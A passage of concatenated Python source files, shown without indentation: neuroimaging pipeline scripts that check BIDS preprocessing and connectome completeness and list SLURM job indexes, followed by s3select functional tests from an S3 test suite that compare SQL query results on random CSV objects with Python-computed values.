logsub = os.path.join(codedir,'04_connectome/01_timeseries_cleaning/logs/CLEAN_%i%s'%(idx,suffix))
if os.path.exists(logsub):
os.remove(logsub)
print("removed %s"%logsub)
rerun_clean = []
for idx,row in participants.iterrows():
participant = row.UID
bidssub = os.path.join(bidsdir,"sub-%s"%participant,'func')
rsbids = [x[13:][:-7] for x in os.listdir(bidssub) if x.endswith('bold.nii.gz')]
# check preprocessing
prepsub = os.path.join(prepdir,'sub-%s'%participant,'MNINonLinear/Results')
if not os.path.exists(prepsub):
print("preprocessing folder does not exist: %s - index: %i"%(participant,idx))
continue
rsprep = os.listdir(prepsub)
undone = set(rsbids)-set(rsprep)
if len(list(undone))>0:
print("incomplete preprocessing for subject: %s - index: %i"%(participant,idx))
allundone.append(participant)
idxundone.append(idx)
prepsubdir = os.path.join(prepdir,'sub-%s'%participant)
if remove:
shutil.rmtree(prepsubdir)
for suffix in ['.err','.out']:
logfile = os.path.join(os.environ.get('CODEDIR'),'logs','PREP_%i%s'%(idx,suffix))
if os.path.exists(logfile):
if remove:
os.remove(logfile)
logdir = os.path.join(os.environ.get('CODEDIR'),'logs',participant)
if os.path.exists(logdir):
if remove:
shutil.rmtree(logdir)
# check connectome
consub = os.path.join(condir,'sub-%s'%participant)
if not os.path.exists(consub):
if remove:
remove_con(idx,participant)
print("cleaned folder does not exist: %s - index: %i - removed logs"%(participant,idx))
rerun_clean.append(idx)
continue
consub = os.path.join(condir,'sub-%s'%participant)
rscon = os.listdir(consub)
rscon = [x for x in rscon if x.startswith('task-rest')]
rsprep = [x for x in rsprep if x.startswith('task-rest')]
undone = set(rsprep)-set(rscon)
if len(list(undone))>0:
if remove:
remove_con(idx,participant)
rerun_clean.append(idx)
print("incomplete cleaning for subject: %s - index: %i - removed all"%(participant,idx))
```
#### File: postbids/databasing/update_db.py
```python
from distutils.dir_util import copy_tree
from collections import Counter
from datetime import datetime
import pandas as pd
import numpy as np
import collections
import shutil
import glob
import json
import csv
import sys
import os
sys.path.append(os.environ.get("CODEDIR"))
from prebids.databasing import psydb
from prebids.dicom import dicom
# functions to check if bids is complete
def check_rest_complete(protocols,UID):
incomplete = False
funcdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'func')
for mod in [('bold','BIC_v2'),('sbref','BIC_v2_SBRef')]:
dbrest = [x for x in protocols if 'REST' in x and x.endswith(mod[1])]
if len(dbrest)==0:
continue
if not os.path.exists(funcdir):
print("Missing func directory while expecting scans for subject %s"%UID)
continue
bidsrest = [x for x in os.listdir(funcdir) if x.endswith("%s.nii.gz"%mod[0]) and 'task-rest' in x]
out = check_exclusions(UID,'rest',mod[0])
if not len(bidsrest)==(len(dbrest)-len(out)):
print("Missing rest (%s) in subject %s: expected %i rests, found %i in bids folder"%(mod[0],UID,len(dbrest),len(bidsrest)))
incomplete = True
return incomplete
def check_dwi_complete(protocols,UID):
incomplete = False
dwidir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'dwi')
for mod in ['dwi','sbref']:
if mod == 'dwi':
dbdwi = [x for x in protocols if 'DWI' in x and not x.endswith("SBRef")]
else:
dbdwi = [x for x in protocols if 'DWI' in x and x.endswith("SBRef")]
if len(dbdwi)==0:
continue
if not os.path.exists(dwidir):
print("Missing dwi directory while expecting scans for subject %s"%UID)
continue
bidsdwi = [x for x in os.listdir(dwidir) if x.endswith("%s.nii.gz"%mod)]
out = check_exclusions(UID,'dwi',mod)
if not len(bidsdwi)==(len(dbdwi)-len(out)):
print("Missing dwi (%s) in subject %s: expected %i dwis, found %i in bids folder"%(mod,UID,len(dbdwi),len(bidsdwi)))
incomplete = True
return incomplete
def check_anat_complete(protocols,UID):
incomplete = False
anatdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%UID,'anat')
for mod in [('T1w','T1w_MPR_BIC_v1'),('T2w','T2w_SPC_BIC_v1')]:
dbanat = [x for x in protocols if x.endswith(mod[1])]
if len(dbanat)==0:
continue
if not os.path.exists(anatdir):
print("Missing anat directory while expecting scans for subject %s"%UID)
continue
bidsanat = [x for x in os.listdir(anatdir) if x.endswith("%s.nii.gz"%mod[0])]
out = check_exclusions(UID,'anat',mod[0])
if not len(bidsanat)==(len(dbanat)-len(out)):
print("Missing aant (%s) in subject %s: expected %i anat, found %i in bids folder"%(mod[0],UID,len(dbanat),len(bidsanat)))
incomplete = True
return incomplete
def check_exclusions(UID,protocol,suffix):
with open(os.environ.get("EXCLUSION"),'r') as fl:
rules = json.load(fl)[0]
removed = []
for k,v in rules['remove'].iteritems():
if UID in v:
removed.append(k)
return [x for x in removed if protocol in x and x.endswith(suffix)]
def check_bids_complete(PSYDB):
DB = pd.read_csv(os.environ.get("NIDBTABLE"))
DB = psydb.remove_old(DB)
DB = psydb.remove_spaces(DB,protocols=True)
DB = psydb.database_exclude(DB)
redo = []
nobids = []
donotproceed = []
for idx,row in PSYDB.iterrows():
subbids = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%row.UID)
if row.UID == 'S6765IZN':
# this subject will throw errors, but is due to empty files
continue
if not os.path.exists(subbids):
print("No bids directory for %s, rerun analysis %i"%(row.UID,idx))
nobids.append(idx)
donotproceed.append(idx)
protocols = DB[row.UID==DB.UID].Protocol
check1 = check_rest_complete(protocols,row.UID)
check2 = check_dwi_complete(protocols,row.UID)
check3 = check_anat_complete(protocols,row.UID)
if check1 or check2 or check3:
redo.append(row.UID)
donotproceed.append(idx)
print("---------------------------------------------")
print("Consider redownloading and processing subjects: %s"%",".join(redo))
print("Bidsification incomplete for subjects: %s"%",".join([str(x) for x in nobids]))
print("---------------------------------------------")
return donotproceed
# check which analyses are done (folders exist, so should be verified with logs)
def check_analyses(PSYDB):
dicomdir = os.environ.get("DICOMDIR")
bidsdir = os.environ.get("BIDSDIR")
mriqcdir = os.environ.get("MRIQCDIR")
prepdir = os.environ.get("PREPDIR")
cleandir = os.environ.get("CLEANDIR")
condir = os.environ.get("CONDIR")
checking = {"dicom":[],"bids":[],'mriqc':[],'prep':[],'con':[]}
for cols in checking.keys():
PSYDB[cols]=0
for cols in checking.keys():
for idx,row in PSYDB.iterrows():
if cols == 'bids':
call = os.path.exists(os.path.join(bidsdir,"sub-%s"%row.UID))
elif cols == 'mriqc':
call = np.logical_not(np.isnan(row.MRIQC_score))
elif cols == 'prep':
call = os.path.exists(os.path.join(prepdir,"sub-%s"%row.UID))
elif cols == 'con':
call = os.path.exists(os.path.join(condir,"sub-%s"%row.UID))
elif cols == 'dicom':
call = os.path.exists(os.path.join(dicomdir,str(row.UID)))
if call:
PSYDB.at[idx,cols] = 1
return PSYDB
def add_mriqc(PSYDB):
table = os.environ.get("QCTABLE")
generalisation = pd.read_csv(table)
for idx,row in PSYDB.iterrows():
inds = np.where(generalisation.subject_id==row.UID)[0]
if len(inds)>0:
score=generalisation.iloc[inds[0]]['prob_y']
PSYDB.at[idx,'MRIQC_score'] = score
PSYDB.at[idx,'MRIQC_pass'] = score<0.5
return PSYDB
def make_slurm_ready(nums):
iterator = np.sort(nums)
newlist = []
for idx,val in enumerate(iterator):
if idx==0:
newlist.append(str(val))
continue
elif idx == len(iterator)-1:
add = ",%i"%val if newlist[::-1][0]!="-" else str(val)
newlist.append(add)
continue
if iterator[idx-1]==val-1 and iterator[idx+1]==val+1:
if newlist[::-1][0]=='-':
continue
else:
newlist.append("-")
else:
if newlist[::-1][0] == '-':
newlist.append("%i"%val)
else:
newlist.append(",%i"%val)
return "".join(newlist)
def check_bids_modalities(subject):
subdir = os.path.join(os.environ.get("BIDSDIR"),"sub-%s"%subject)
out = {x:False for x in ['dwi','t1','t2','fmap','rest','nback']}
files = glob.glob('%s/*/*'%subdir)
files = ["/".join(x.split("/")[9:]) for x in files]
startend = [('dwi','dwi','','dwi.nii.gz',4),
('t1','anat','','T1w.nii.gz',1),
('t2','anat','','T2w.nii.gz',1),
('rest','func','task-rest','bold.nii.gz',1),
('nback','func','task-nback','bold.nii.gz',1),
('fmap','fmap','','epi.nii.gz',1)]
for check in startend:
fls = [x for x in files if x.startswith(check[1]) and check[2] in x and x.endswith(check[3])]
if len(fls) >= check[4]:
out[check[0]] = True
return out
def checks(check,mod):
if mod == 'todo_qc':
return check['t1'] or check['t2'] or check['rest'] or check['nback']
if mod == 'todo_prep':
return check['t1'] and check['t2'] and check['rest'] and check['fmap']
if mod == 'todo_dwi':
return check['t1'] and check['t2'] and check['dwi']
if mod == 'todo_rest':
return check['t1'] and check['t2'] and check['rest']
def check_analyses_todo(participants):
if not os.path.exists(os.path.join(os.environ.get("MRIQCDIR"),'derivatives')):
qc_done = []
else:
qc_done = os.listdir(os.path.join(os.environ.get("MRIQCDIR"),'derivatives'))
qc_done = list(np.unique([x.split("_")[0] for x in qc_done]))
prep_done = os.listdir(os.environ.get("PREPDIR"))
con_done = os.listdir(os.environ.get("CONDIR"))
participants['todo_qc'] = 0
participants['todo_prep'] = 0
participants['todo_dwi'] = 0
participants['todo_rest'] = 0
for idx,row in participants.iterrows():
check = check_bids_modalities(row.UID)
# check mriqc:
if not 'sub-%s'%row.UID in qc_done and checks(check,'todo_qc'):
participants.at[idx,'todo_qc'] = 1
if not 'sub-%s'%row.UID in prep_done and checks(check,'todo_prep'):
participants.at[idx,'todo_prep'] = 1
if not 'sub-%s'%row.UID in con_done and checks(check,'todo_rest'):
participants.at[idx,'todo_rest'] = 1
if checks(check,'todo_dwi'):
participants.at[idx,'todo_dwi'] = 1
out = {
'qc':list(np.where(participants['todo_qc']==1)[0]),
'prep':list(np.where(participants['todo_prep']==1)[0]),
'dwi':list(np.where(participants['todo_dwi']==1)[0]),
'rest':list(np.where(participants['todo_rest']==1)[0])
}
qc_print = make_slurm_ready(out['qc'])
print('Run MRIQC on the following indexes: %s'%qc_print)
prep_print = make_slurm_ready(out['prep'])
print('Run preprocessing on the following indexes: %s'%prep_print)
dwi_print = make_slurm_ready(out['dwi'])
print('Run dwi on the following indexes (note that there s not a good check at this point): %s'%dwi_print)
con_print = make_slurm_ready(out['rest'])
print("Run clean on the following indexes: %s"%con_print)
return out
``` |
{
"source": "joke-lee/s3-tests",
"score": 3
} |
#### File: s3tests_boto3/functional/test_s3select.py
```python
import nose
import random
import string
from nose.plugins.attrib import attr
import uuid
from nose.tools import eq_ as eq
from . import (
get_client
)
region_name = ''
# recurssion function for generating arithmetical expression
def random_expr(depth):
# depth is the complexity of expression
if depth==1 :
return str(int(random.random() * 100) + 1)+".0"
return '(' + random_expr(depth-1) + random.choice(['+','-','*','/']) + random_expr(depth-1) + ')'
def generate_s3select_where_clause(bucket_name,obj_name):
a=random_expr(4)
b=random_expr(4)
s=random.choice([ '<','>','==','<=','>=','!=' ])
try:
eval( a )
eval( b )
except ZeroDivisionError:
return
# generate s3select statement using generated randome expression
# upon count(0)>0 it means true for the where clause expression
# the python-engine {eval( conditional expression )} should return same boolean result.
s3select_stmt = "select count(0) from stdin where " + a + s + b + ";"
res = remove_xml_tags_from_result( run_s3select(bucket_name,obj_name,s3select_stmt) ).replace(",","")
nose.tools.assert_equal(int(res)>0 , eval( a + s + b ))
def generate_s3select_expression_projection(bucket_name,obj_name):
# generate s3select statement using generated randome expression
# statement return an arithmetical result for the generated expression.
# the same expression is evaluated by python-engine, result should be close enough(Epsilon)
e = random_expr( 4 )
try:
eval( e )
except ZeroDivisionError:
return
if eval( e ) == 0:
return
res = remove_xml_tags_from_result( run_s3select(bucket_name,obj_name,"select " + e + " from stdin;",) ).replace(",","")
# accuracy level
epsilon = float(0.000001)
# both results should be close (epsilon)
assert (1 - (float(res.split("\n")[1]) / eval( e )) ) < epsilon
@attr('s3select')
def get_random_string():
return uuid.uuid4().hex[:6].upper()
def test_generate_where_clause():
# create small csv file for testing the random expressions
single_line_csv = create_random_csv_object(1,1)
bucket_name = "test"
obj_name = get_random_string() #"single_line_csv.csv"
upload_csv_object(bucket_name,obj_name,single_line_csv)
for _ in range(100):
generate_s3select_where_clause(bucket_name,obj_name)
@attr('s3select')
def test_generate_projection():
# create small csv file for testing the random expressions
single_line_csv = create_random_csv_object(1,1)
bucket_name = "test"
obj_name = get_random_string() #"single_line_csv.csv"
upload_csv_object(bucket_name,obj_name,single_line_csv)
for _ in range(100):
generate_s3select_expression_projection(bucket_name,obj_name)
def create_csv_object_for_datetime(rows,columns):
result = ""
for _ in range(rows):
row = ""
for _ in range(columns):
row = row + "{}{:02d}{:02d}-{:02d}{:02d}{:02d},".format(random.randint(0,100)+1900,random.randint(1,12),random.randint(1,28),random.randint(0,23),random.randint(0,59),random.randint(0,59),)
result += row + "\n"
return result
def create_random_csv_object(rows,columns,col_delim=",",record_delim="\n",csv_schema=""):
result = ""
if len(csv_schema)>0 :
result = csv_schema + record_delim
for _ in range(rows):
row = ""
for _ in range(columns):
row = row + "{}{}".format(random.randint(0,1000),col_delim)
result += row + record_delim
return result
def create_random_csv_object_string(rows,columns,col_delim=",",record_delim="\n",csv_schema=""):
result = ""
if len(csv_schema)>0 :
result = csv_schema + record_delim
for _ in range(rows):
row = ""
for _ in range(columns):
if random.randint(0,9) == 5:
row = row + "{}{}".format(''.join(random.choice(string.ascii_letters) for m in range(10)) + "aeiou",col_delim)
else:
row = row + "{}{}".format(''.join("cbcd" + random.choice(string.ascii_letters) for m in range(10)) + "vwxyzzvwxyz" ,col_delim)
result += row + record_delim
return result
def upload_csv_object(bucket_name,new_key,obj):
client = get_client()
client.create_bucket(Bucket=bucket_name)
client.put_object(Bucket=bucket_name, Key=new_key, Body=obj)
# validate uploaded object
c2 = get_client()
response = c2.get_object(Bucket=bucket_name, Key=new_key)
eq(response['Body'].read().decode('utf-8'), obj, 's3select error[ downloaded object not equal to uploaded objecy')
def run_s3select(bucket,key,query,column_delim=",",row_delim="\n",quot_char='"',esc_char='\\',csv_header_info="NONE"):
s3 = get_client()
r = s3.select_object_content(
Bucket=bucket,
Key=key,
ExpressionType='SQL',
InputSerialization = {"CSV": {"RecordDelimiter" : row_delim, "FieldDelimiter" : column_delim,"QuoteEscapeCharacter": esc_char, "QuoteCharacter": quot_char, "FileHeaderInfo": csv_header_info}, "CompressionType": "NONE"},
OutputSerialization = {"CSV": {}},
Expression=query,)
result = ""
for event in r['Payload']:
if 'Records' in event:
records = event['Records']['Payload'].decode('utf-8')
result += records
return result
def remove_xml_tags_from_result(obj):
result = ""
for rec in obj.split("\n"):
if(rec.find("Payload")>0 or rec.find("Records")>0):
continue
result += rec + "\n" # remove by split
return result
def create_list_of_int(column_pos,obj,field_split=",",row_split="\n"):
list_of_int = []
for rec in obj.split(row_split):
col_num = 1
if ( len(rec) == 0):
continue
for col in rec.split(field_split):
if (col_num == column_pos):
list_of_int.append(int(col))
col_num+=1
return list_of_int
@attr('s3select')
def test_count_operation():
csv_obj_name = get_random_string()
bucket_name = "test"
num_of_rows = 1234
obj_to_load = create_random_csv_object(num_of_rows,10)
upload_csv_object(bucket_name,csv_obj_name,obj_to_load)
res = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin;") ).replace(",","")
nose.tools.assert_equal( num_of_rows, int( res ))
@attr('s3select')
def test_column_sum_min_max():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
csv_obj_name_2 = get_random_string()
bucket_name_2 = "testbuck2"
upload_csv_object(bucket_name_2,csv_obj_name_2,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 1 , csv_obj )
res_target = min( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = min( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select avg(int(_6)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 6 , csv_obj )
res_target = float(sum(list_int ))/10000
nose.tools.assert_equal( float(res_s3select), float(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select max(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = max( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select max(int(_7)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 7 , csv_obj )
res_target = max( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select sum(int(_4)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 4 , csv_obj )
res_target = sum( list_int )
nose.tools.assert_equal( int(res_s3select), int(res_target))
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select sum(int(_7)) from stdin;") ).replace(",","")
list_int = create_list_of_int( 7 , csv_obj )
res_target = sum( list_int )
nose.tools.assert_equal( int(res_s3select) , int(res_target) )
# the following queries, validates on *random* input an *accurate* relation between condition result,sum operation and count operation.
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name_2,csv_obj_name_2,"select count(0),sum(int(_1)),sum(int(_2)) from stdin where (int(_1)-int(_2)) == 2;" ) )
count,sum1,sum2,d = res_s3select.split(",")
nose.tools.assert_equal( int(count)*2 , int(sum1)-int(sum2 ) )
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0),sum(int(_1)),sum(int(_2)) from stdin where (int(_1)-int(_2)) == 4;" ) )
count,sum1,sum2,d = res_s3select.split(",")
nose.tools.assert_equal( int(count)*4 , int(sum1)-int(sum2) )
@attr('s3select')
def test_nullif_expressions():
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where nullif(_1,_2) is null ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 == _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where not nullif(_1,_2) is null ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 != _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
res_s3select_nullif = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where nullif(_1,_2) == _1 ;") ).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select count(0) from stdin where _1 != _2 ;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_nullif, res_s3select)
@attr('s3select')
def test_lowerupper_expressions():
csv_obj = create_random_csv_object(1,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select lower("AB12cd$$") from stdin ;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "ab12cd$$,")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select upper("ab12CD$$") from stdin ;') ).replace("\n","")
nose.tools.assert_equal( res_s3select, "AB12CD$$,")
@attr('s3select')
def test_in_expressions():
# purpose of test: engine is process correctly several projections containing aggregation-functions
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) in(1);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) == 1;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) in(1,0);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where int(_1) == 1 or int(_1) == 0;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2) in(1,0,2);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2) == 1 or int(_2) == 0 or int(_2) == 2;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2)*2 in(int(_3)*2,int(_4)*3,int(_5)*5);')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_2) from stdin where int(_2)*2 == int(_3)*2 or int(_2)*2 == int(_4)*3 or int(_2)*2 == int(_5)*5;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where characterlength(_1) == 2 and substr(_1,2,1) in ("3");')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select int(_1) from stdin where _1 like "_3";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
@attr('s3select')
def test_like_expressions():
csv_obj = create_random_csv_object_string(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _1 like "%aeio%";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_1,11,4) == "aeio" ;')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _1 like "cbcd%";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_1,1,4) == "cbcd";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _3 like "%y[y-z]";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_3,charlength(_3),1) between "y" and "z" and substr(_3,charlength(_3)-1,1) == "y";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _2 like "%yz";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_2,charlength(_2),1) == "z" and substr(_2,charlength(_2)-1,1) == "y";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _3 like "c%z";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_3,charlength(_3),1) == "z" and substr(_3,1,1) == "c";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
res_s3select_in = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(*) from stdin where _2 like "%xy_";')).replace("\n","")
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name, 'select count(*) from stdin where substr(_2,charlength(_2)-1,1) == "y" and substr(_2,charlength(_2)-2,1) == "x";')).replace("\n","")
nose.tools.assert_equal( res_s3select_in, res_s3select )
@attr('s3select')
def test_complex_expressions():
# purpose of test: engine is process correctly several projections containing aggregation-functions
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select min(int(_1)),max(int(_2)),min(int(_3))+1 from stdin;")).replace("\n","")
min_1 = min ( create_list_of_int( 1 , csv_obj ) )
max_2 = max ( create_list_of_int( 2 , csv_obj ) )
min_3 = min ( create_list_of_int( 3 , csv_obj ) ) + 1
__res = "{},{},{},".format(min_1,max_2,min_3)
# assert is according to radom-csv function
nose.tools.assert_equal( res_s3select, __res )
# purpose of test that all where conditions create the same group of values, thus same result
res_s3select_substr = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where substr(_2,1,1) == "1"')).replace("\n","")
res_s3select_between_numbers = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where int(_2)>=100 and int(_2)<200')).replace("\n","")
res_s3select_eq_modolu = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select min(int(_2)),max(int(_2)) from stdin where int(_2)/100 == 1 or int(_2)/10 == 1 or int(_2) == 1')).replace("\n","")
nose.tools.assert_equal( res_s3select_substr, res_s3select_between_numbers)
nose.tools.assert_equal( res_s3select_between_numbers, res_s3select_eq_modolu)
@attr('s3select')
def test_alias():
# purpose: test is comparing result of exactly the same queries , one with alias the other without.
# this test is setting alias on 3 projections, the third projection is using other projection alias, also the where clause is using aliases
# the test validate that where-clause and projections are executing aliases correctly, bare in mind that each alias has its own cache,
# and that cache need to be invalidate per new row.
csv_obj = create_random_csv_object(10000,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1) as a1, int(_2) as a2 , (a1+a2) as a3 from stdin where a3>100 and a3<300;") ).replace(",","")
res_s3select_no_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1),int(_2),int(_1)+int(_2) from stdin where (int(_1)+int(_2))>100 and (int(_1)+int(_2))<300;") ).replace(",","")
nose.tools.assert_equal( res_s3select_alias, res_s3select_no_alias)
@attr('s3select')
def test_alias_cyclic_refernce():
number_of_rows = 10000
# purpose of test is to validate the s3select-engine is able to detect a cyclic reference to alias.
csv_obj = create_random_csv_object(number_of_rows,10)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select int(_1) as a1,int(_2) as a2, a1+a4 as a3, a5+a1 as a4, int(_3)+a3 as a5 from stdin;") )
find_res = res_s3select_alias.find("number of calls exceed maximum size, probably a cyclic reference to alias")
assert int(find_res) >= 0
@attr('s3select')
def test_datetime():
# purpose of test is to validate date-time functionality is correct,
# by creating same groups with different functions (nested-calls) ,which later produce the same result
csv_obj = create_csv_object_for_datetime(10000,1)
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where extract("year",timestamp(_1)) > 1950 and extract("year",timestamp(_1)) < 1960;') )
res_s3select_substr = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where int(substr(_1,1,4))>1950 and int(substr(_1,1,4))<1960;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_substr)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("month",timestamp(_1),dateadd("month",2,timestamp(_1)) ) == 2;') )
res_s3select_count = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_count)
res_s3select_date_time = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("year",timestamp(_1),dateadd("day", 366 ,timestamp(_1))) == 1 ;') )
nose.tools.assert_equal( res_s3select_date_time, res_s3select_count)
# validate that utcnow is integrate correctly with other date-time functions
res_s3select_date_time_utcnow = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,'select count(0) from stdin where datediff("hours",utcnow(),dateadd("day",1,utcnow())) == 24 ;') )
nose.tools.assert_equal( res_s3select_date_time_utcnow, res_s3select_count)
@attr('s3select')
def test_csv_parser():
# purpuse: test default csv values(, \n " \ ), return value may contain meta-char
# NOTE: should note that default meta-char for s3select are also for python, thus for one example double \ is mandatory
csv_obj = ',first,,,second,third="c31,c32,c33",forth="1,2,3,4",fifth="my_string=\\"any_value\\" , my_other_string=\\"aaaa,bbb\\" ",' + "\n"
csv_obj_name = get_random_string()
bucket_name = "test"
upload_csv_object(bucket_name,csv_obj_name,csv_obj)
# return value contain comma{,}
res_s3select_alias = remove_xml_tags_from_result( run_s3select(bucket_name,csv_obj_name,"select _6 from stdin;") ).replace("\n","")
nose.tools.assert_equal( res_s3select_alias, 'third="c31,c32,c33",')
# return value contain comma{,}
